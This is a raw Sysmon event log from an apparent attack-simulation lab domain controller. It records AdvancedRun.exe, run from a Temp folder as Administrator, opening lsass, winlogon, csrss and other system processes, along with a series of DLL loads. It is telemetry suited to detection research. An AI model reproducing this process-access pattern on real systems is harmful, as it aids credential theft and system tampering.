19:56:09.228{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004057066Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
19:56:09.227{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057065Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
19:56:09.227{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057064Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
19:56:09.227{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057063Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
19:56:09.227{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057062Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
19:56:09.227{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057061Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
19:56:09.227{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057060Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
19:56:09.227{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057059Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
19:56:09.226{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000004057058Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.226{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004057057Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
19:56:09.226{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057056Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
19:56:09.219{834264DD-DAE4-61EA-0C00-000000002702}6524660C:\Windows\system32\lsass.exe{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000004057055Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.214{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004057054Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.210{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft 
CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004057053Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.209{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004057052Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.208{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004057051Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.207{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000004057050Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.207{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004057049Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.206{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004057048Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.206{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4886 (rs1_release.220104-1735)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=F27E9ABE4DCD6E5CD27820AF12993889,SHA256=D67BA8D05C35C53CC669CFEB2FAA8139D389257EFE5209781438B4043694A763trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004057047Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
19:56:09.206{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004057046Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.205{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004057045Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.204{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004057044Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.204{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft 
Corporationbcryptprimitives.dllMD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004057043Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.204{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004057042Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.203{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004057041Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.203{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4886 (rs1_release.220104-1735)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=AB5AE3CC1EAA79B84589257A14BC2480,SHA256=BD0216233D84012BD61BE38964798F8F6686DA61E2E8E04D1B395AB8566CA084trueMicrosoft WindowsValidATTACKRANGE\Administrator 
